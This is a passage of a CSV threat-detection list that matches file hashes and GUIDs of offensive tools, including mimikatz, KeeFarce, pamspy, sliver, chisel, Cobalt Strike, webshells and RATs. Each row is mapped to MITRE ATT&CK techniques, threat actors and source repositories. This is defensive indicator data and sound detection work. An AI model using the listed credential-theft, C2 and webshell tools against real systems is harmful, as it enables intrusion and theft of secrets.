fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26513" "*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*",".{0,1000}5086CE01\-1032\-4CA3\-A302\-6CFF2A8B64DC.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","#GUIDproject","private github repo","8","","N/A","","","","26514" "*508764b5a7645ca6cd2968f9ad4a37029a7fe1f45d90b46b2f6c03393f5e2730*",".{0,1000}508764b5a7645ca6cd2968f9ad4a37029a7fe1f45d90b46b2f6c03393f5e2730.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - 
MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26515" "*50941ad9fd99db6fca5debc3c89b3e899a9527d7*",".{0,1000}50941ad9fd99db6fca5debc3c89b3e899a9527d7.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","26518" "*509e8855fc2ebcd22bd352a34ef1a0493c4cf10b488b5b2d2fece7ad168518f9*",".{0,1000}509e8855fc2ebcd22bd352a34ef1a0493c4cf10b488b5b2d2fece7ad168518f9.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","#filehash","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","26521" "*509e9cb4861e4e01742bd96d7a380c47dd4dae47a7a6b18cd474763041c010b1*",".{0,1000}509e9cb4861e4e01742bd96d7a380c47dd4dae47a7a6b18cd474763041c010b1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26522" 
"*50a1eed798d16ac30f1bbf50599a29e81de2ac953f45a23174d8b3fb9902d744*",".{0,1000}50a1eed798d16ac30f1bbf50599a29e81de2ac953f45a23174d8b3fb9902d744.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26523" "*50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5*",".{0,1000}50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26526" "*50bcc21f5397941a6823e2a5ec6aa8ec5a8f43f7df1513abbaa5b850236ad4db*",".{0,1000}50bcc21f5397941a6823e2a5ec6aa8ec5a8f43f7df1513abbaa5b850236ad4db.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26527" "*50C0BF9479EFC93FA9CF1AA99BD?CA923273B71A1*",".{0,1000}50C0BF9479EFC93FA9CF1AA99BD\?CA923273B71A1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","26528" "*50c461593a4ad6f09903a04e528de6991e745be1a7b444c002987348d921fcb0*",".{0,1000}50c461593a4ad6f09903a04e528de6991e745be1a7b444c002987348d921fcb0.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26530" "*50c8a6e0117fd0a8c8fddb948e91c8488d67782c2975f4d7f9f87ff9a528b377*",".{0,1000}50c8a6e0117fd0a8c8fddb948e91c8488d67782c2975f4d7f9f87ff9a528b377.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26531" "*50cce787f7b403a73b352913648361af2949a21bb85b081acccdecc1ec4c63f4*",".{0,1000}50cce787f7b403a73b352913648361af2949a21bb85b081acccdecc1ec4c63f4.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26532" "*50ce414b7091cd91c05a9e3393cdf0dd44ee9ef14ac12736adfbd3180cd28a03*",".{0,1000}50ce414b7091cd91c05a9e3393cdf0dd44ee9ef14ac12736adfbd3180cd28a03.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - 
T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26533" "*50cf6bcfb14dc0fd05eb46a5b8a804541879a555c1e50ce64b766af9d486294b*",".{0,1000}50cf6bcfb14dc0fd05eb46a5b8a804541879a555c1e50ce64b766af9d486294b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26534" "*50d8184f7bfb2ed1c762bd9d66fe437861bb3def73ad14bc9baf61f19d1fa9fd*",".{0,1000}50d8184f7bfb2ed1c762bd9d66fe437861bb3def73ad14bc9baf61f19d1fa9fd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26536" "*50dadf81bd1df69948628db113c62c4f08e8c12df21ec59b02aa65a4d593c906*",".{0,1000}50dadf81bd1df69948628db113c62c4f08e8c12df21ec59b02aa65a4d593c906.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26537" 
"*50e67569fd7d2313ac7d9b446f5519a33ab4755ccb5c9829f84d8cbf4f6abc7c*",".{0,1000}50e67569fd7d2313ac7d9b446f5519a33ab4755ccb5c9829f84d8cbf4f6abc7c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26539" "*50eb54d0976374701c6051c23b993708,4d67d3d82b1adcc1b96e743e9b0efaaa8a566e3d,a34e71ededf334d3d6a480e3738c91fccbb4d2c1fbeec7192db9793a2541e8ca*",".{0,1000}50eb54d0976374701c6051c23b993708,4d67d3d82b1adcc1b96e743e9b0efaaa8a566e3d,a34e71ededf334d3d6a480e3738c91fccbb4d2c1fbeec7192db9793a2541e8ca.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#filehash","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","26540" "*50feb4f8f0d8ae6d64d2b65957a4a6d597c451a89da5970d0bf37d1ef67a8fbb*",".{0,1000}50feb4f8f0d8ae6d64d2b65957a4a6d597c451a89da5970d0bf37d1ef67a8fbb.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26544" "*51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129*",".{0,1000}51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source 
cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26545" "*51033040fbc818f2b5fccb826fbd87b7c57f9599c6b8e48aa0f4bd1a397a09bb*",".{0,1000}51033040fbc818f2b5fccb826fbd87b7c57f9599c6b8e48aa0f4bd1a397a09bb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26546" "*510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d*",".{0,1000}510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","26548" "*51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379*",".{0,1000}51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26549" "*5109c0fda9b83cffa3c52a90801b96a37f5e874fd18c9d771dd943c304e9c750*",".{0,1000}5109c0fda9b83cffa3c52a90801b96a37f5e874fd18c9d771dd943c304e9c750.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26550" "*510c6896ab176ad04a534ed48a3c74957ca929accbaf277ee1d678eac6bf3b36*",".{0,1000}510c6896ab176ad04a534ed48a3c74957ca929accbaf277ee1d678eac6bf3b36.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","26552" "*51166803b9409224e3c4cdd77b61002707eed020e3d3e03ffa4b03dfabf1f7e4*",".{0,1000}51166803b9409224e3c4cdd77b61002707eed020e3d3e03ffa4b03dfabf1f7e4.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#filehash","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","26553" "*5117731fa0ee6447f80940c0e41778b000e6ec53673ba2ab9c9eaf5234899592*",".{0,1000}5117731fa0ee6447f80940c0e41778b000e6ec53673ba2ab9c9eaf5234899592.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26554" "*511cb881123380d9b669c7664aeef8fc9c1ddd1417488fbd1da57cdf0d803c9d*",".{0,1000}511cb881123380d9b669c7664aeef8fc9c1ddd1417488fbd1da57cdf0d803c9d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26555" "*511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1*",".{0,1000}511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","26556" "*51200fbd06de3460053924b51d118c57db486f2579ebd402a961f7539dddf37d*",".{0,1000}51200fbd06de3460053924b51d118c57db486f2579ebd402a961f7539dddf37d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26557" "*5121c52bf1d468e8fcfffc35b724256275f7338a0fced44213e6e48fae889437*",".{0,1000}5121c52bf1d468e8fcfffc35b724256275f7338a0fced44213e6e48fae889437.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","26558" "*512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7*",".{0,1000}512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26560" "*512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c*",".{0,1000}512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","26561" "*51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909*",".{0,1000}51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26564" "*513c40085db62d92e26512d78a40e9f32466f45f563cde8cd6892f5b135e8aa0*",".{0,1000}513c40085db62d92e26512d78a40e9f32466f45f563cde8cd6892f5b135e8aa0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26565" 
"*51474db254eb9ee763f92372d5056aa268269e60d4b7d83cb340734c1c10ec65*",".{0,1000}51474db254eb9ee763f92372d5056aa268269e60d4b7d83cb340734c1c10ec65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26567" "*51479ff32cd7f2520a0b252fa3731361c3cc3288d6b0f7831b91a208cd91aaa3*",".{0,1000}51479ff32cd7f2520a0b252fa3731361c3cc3288d6b0f7831b91a208cd91aaa3.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","26568" "*5154b1146c48faca26e0276ce7fecb023e5d3d2b62d3e2157df51650ba834e23*",".{0,1000}5154b1146c48faca26e0276ce7fecb023e5d3d2b62d3e2157df51650ba834e23.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26571" "*515e62ccd2de0b47bce74fd7a039ca47390fee162eddec6b633bbc1a26662a86*",".{0,1000}515e62ccd2de0b47bce74fd7a039ca47390fee162eddec6b633bbc1a26662a86.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26573" "*516280565958*",".{0,1000}516280565958.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","26574" "*516280565959*",".{0,1000}516280565959.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","26575" "*516387f97a4360654c232915fa5506013fc33f4b4e50e801b4a748070d5ffd3b*",".{0,1000}516387f97a4360654c232915fa5506013fc33f4b4e50e801b4a748070d5ffd3b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26576" "*51650d59ffa17366d2190e05eb58c94975156449fce424f47cea328edcb561bf*",".{0,1000}51650d59ffa17366d2190e05eb58c94975156449fce424f47cea328edcb561bf.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26577" "*516763824343085c42dd86c02b55fdb57ce007b6f06014172ff8fe4bd8547351*",".{0,1000}516763824343085c42dd86c02b55fdb57ce007b6f06014172ff8fe4bd8547351.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - 